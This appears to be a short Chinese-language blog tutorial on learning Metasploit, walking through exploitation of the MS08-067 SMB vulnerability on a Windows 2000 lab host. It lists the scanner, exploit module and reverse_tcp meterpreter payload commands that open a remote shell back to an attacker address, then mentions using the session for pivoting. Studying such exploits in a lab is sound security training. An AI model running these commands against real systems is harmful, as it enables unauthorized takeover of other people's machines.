Metasploit學習1

控制檯是較爲方便的操作接口,因此在命令行下輸入msfconsole命令進入控制檯

考慮到ms08-067是比較普遍也是較容易上手的安全漏洞,因此拿它作練習

首先進行掃描,確定開放samba服務的主機

加載掃描模塊,use scanner/smb/version

設定掃描範圍,set rhosts 192.168.11.0/24

查找到192.168.11.2,操作系統爲windows 2000

查詢相關資料,該版本存在ms08-067漏洞

在控制檯中輸入search ms08_067,查詢目前加載的所有安全漏洞***模塊,

每個模塊,根據***成功的可能性,有評價

加載選定的***模塊,use windows/smb/ms08_067_netapi

輸入show options,查看模塊涉及的參數

設定目標主機的地址,set rhost 192.168.11.2

查詢與***模塊有關的***代碼,search payload

一旦漏洞***成功,通過***代碼取得控制權或進行破壞

設定選定的***代碼,set payload windows/meterpreter/reverse_tcp

再次輸入show options,查看***代碼的相關參數

設定***主機的地址,set lhost 192.168.11.10 ,以便於傳回連接

輸入exploit發起***

可能一次不能取得成功,可以多試幾次

成功後,返回meterpreter控制檯,取得對目標主機的控制權

控制檯提供了系統命令,可以用於跳板***。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章